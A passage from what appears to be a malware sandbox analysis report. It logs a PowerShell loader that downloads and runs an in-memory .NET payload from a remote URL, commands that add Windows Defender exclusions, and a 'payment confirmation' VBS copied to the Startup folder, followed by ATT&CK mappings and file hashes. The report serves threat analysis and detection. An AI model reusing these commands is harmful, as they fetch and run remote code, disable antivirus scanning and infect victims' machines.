[System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $jnkyw -OutFile $obTxq -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$obTxq = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$svrbp = ( Get-Content -Path $obTxq ) ;Invoke-WebRequest -URI $svrbp -OutFile $obTxq -UseBasicParsing } ;$wxlhh = (Get-Content -Path $obTxq -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $wxlhh.replace('↓:↓','A') );$XhRTo = 'C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs';$JzTiG = 'ClassLibrary3.';$gsXfE = 'Class1';$niqGm = 'prFVI';[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).GetType( $JzTiG + $gsXfE ).GetMethod( $niqGm ).Invoke( $null , [object[]] ( 'txt.z/oc.ngisedlartuen//:sptth' , $XhRTo , 'D DD' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4504
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c
      4⤵
      PID:4072
  - - C:\Windows\system32\PING.EXE
      "C:\Windows\system32\PING.EXE" 127.0.0.1
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4808
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABvAGIAVAB4AHEAIAA9ACAAKABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApACAAKwAgACcAZABsAGwAMAAxAC4AdAB4AHQAJwApACAAOwAkAHMAdgByAGIAcAAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABvAGIAVAB4AHEAIAApACAAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAJABzAHYAcgBiAHAAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAG8AYgBUAHgAcQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAIAA= -inputFormat xml -outputFormat text
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2380
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1184
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\LocalLow\Daft Sytem\"
      4⤵
      PID:4108
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\\x11.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\LocalLow\Daft Sytem\\x22.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4740
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      Drops startup file
      PID:3412
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:2616
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      Drops startup file
      PID:572
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:2900
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      Drops startup file
      PID:2200
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:864
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      PID:4796
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:4496
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      PID:3264
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:2644
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      PID:2532
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:2084
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      PID:4352
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:2460
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      PID:1416
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:2940
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c copy "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs"
      4⤵
      PID:4804
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
      4⤵
      PID:3088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Daft Sytem\server.txt

Filesize
377B

MD5
3447d10b17626497a24e3f8e9e3e2086

SHA1
131a1a9365cf9d6659e26805f9daa7cbbad8abde

SHA256
1b8480048e05ca8b1adf55548506a37c5b15307187f8e575dda9760b2e311ec1

SHA512
16369348d6812b6094a2b6a193d2d2cae07b9a9321d0c1e99f906d1410738cd1a1dac6d0384186009a675ef992887d89533a6bcffd26bbb65cf6899488d79c15

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft Sytem\x11.ps1

Filesize
318B

MD5
7dd87b3aec4a679add11258a1eb52da1

SHA1
c786f830c35187ef505bcce035c0b3a84c9477a4

SHA256
5adf2614aaf82a703509f417b32a1905bb6d76462d9dd3b73ae4dcc9e08ac1bc

SHA512
374bb4c9dd13ba7ec67aa0fbf505c17ce85f00bc8973c956a335671ba0e731ac8a9cf29a1c792537407786212b9bd0834acad7cea9d5d1649bdb813db3924f15

Download Submit
C:\Users\Admin\AppData\LocalLow\Daft Sytem\x22.ps1

Filesize
322B

MD5
99634039a2cbfc987acf747e8fbf1dd6

SHA1
bb1967544b7dc07eef4cd6b9ef4675460512cb85

SHA256
3a15fff6458e3223fad5ca4d90ab8a43fc15813a50319e2a5e26daca8ceefc97

SHA512
39ec4d6831163bf25baf3342857f516d1e095b47a71737ab8144dcbeee778aa1e1ade2d9036880d5e11e4bf7599380f14ff6303d62542cb84b05fa9535cb0a89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
223bd4ae02766ddc32e6145fd1a29301

SHA1
900cfd6526d7e33fb4039a1cc2790ea049bc2c5b

SHA256
1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e

SHA512
648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
071e40c48b137a5d464968fcac2ed5f9

SHA1
26d7916861ada434d4457569055aeffebb2e1617

SHA256
96127b0d042da66bf8332ddd5a22ba4046c47fa2306d18319c22097560d28f5e

SHA512
8d6d81091f04e06c3c4562f606d3b3ab2d3ecf015d8f6c0ac75b1477450aaa3d98b7ddf79b682ff69c3fef1c109443a8cb23d257442cff6d0bcb575cb6c0e67e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c19d356683952dc136e917fbe5b20ac1

SHA1
58d50b1e6c1877cb7d98e3c5ef6a6f44107e0005

SHA256
2994340591bee23f4900c208788652b1ea445d111f42ae5e667ef8b2c157be10

SHA512
afe82c770309d27d20022cc39996d2da9fbca6e44a6050d7655cdf975da74cb2588d795e486814732df2ed1360bbe78cc72acc6980b93da5d1f971fbf6a1b7c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
3db7700285c7242187a71595fed14c7b

SHA1
f3fe2117294d2ac893a6f8e7f5596eec886e08cf

SHA256
c6afcc8cad6cefc636851d9075e249be6a85d9143ea7440972c53f68b6348e47

SHA512
f3ac6dc338d219996c3d8ef237cf1cdfd403e979cc61b4bb641d3ffab17b55ab45b3e4b0cd44f190ae471ba1940c017867382cc52cdfbb734d513fc7b99665c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c1hhowhl.4cg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
26B

MD5
be422e7412772496df87c748ef750aad

SHA1
c3d18b6683742f7029a6550b3002ed6722d4e3bf

SHA256
1013ec0e7349dc1b62ad4be57cbd260a0c4dec538349f8da90aa5840df50ba64

SHA512
53921908e82ef6fe69c23fd99423e8aed7e1c4b2e5cdae3cb715eb2338f63a39621259284e83b56b3aa4af9f33f73c5f53a188ff421b36cf7232f57540c40938

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
46KB

MD5
58ce662824c0d7b7b6ae91bf1ee0b06b

SHA1
4e2df98f30e12622e3e0fe1e9da35af43bbcf997

SHA256
dd3c7f6f7686891fab896a1da005e13c1258748b56c673b79be57e09e3cf9496

SHA512
03f8ad9c6f86b7f6c7a5808855cdd38dcde5d3edf1ebb3ec7fa76ac86d9300666f9fcb2332934786532ba6089b0a6494e1ad800d54e4c6387ef64a15cd2f0bd4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs

Filesize
585KB

MD5
e8b451ec06c7782196418eb73e4b0731

SHA1
0b0b23f532f7e6241fabe6eb5cb1e8490b3dd1f4

SHA256
3e0f0059d28f652c2575514c53d31dbfa1c96bd13d1f3457a22fd0dca5336011

SHA512
a3b40c48836fe2dcb84c3803a1a815039a93b4463e0acbe90372610b64663d40c6642461cfa8931bcb199cb43f842f9552e08b95d7108578847b14cbb7742918

Download Submit
memory/4504-39-0x000002BFE1800000-0x000002BFE180A000-memory.dmp

Filesize
40KB

Download
memory/4620-0-0x00007FFE54FA3000-0x00007FFE54FA5000-memory.dmp

Filesize
8KB

Download
memory/4620-24-0x00007FFE54FA0000-0x00007FFE55A61000-memory.dmp

Filesize
10.8MB

Download
memory/4620-23-0x00007FFE54FA3000-0x00007FFE54FA5000-memory.dmp

Filesize
8KB

Download
memory/4620-12-0x00007FFE54FA0000-0x00007FFE55A61000-memory.dmp

Filesize
10.8MB

Download
memory/4620-11-0x00007FFE54FA0000-0x00007FFE55A61000-memory.dmp

Filesize
10.8MB

Download
memory/4620-6-0x0000024771500000-0x0000024771522000-memory.dmp

Filesize
136KB

Download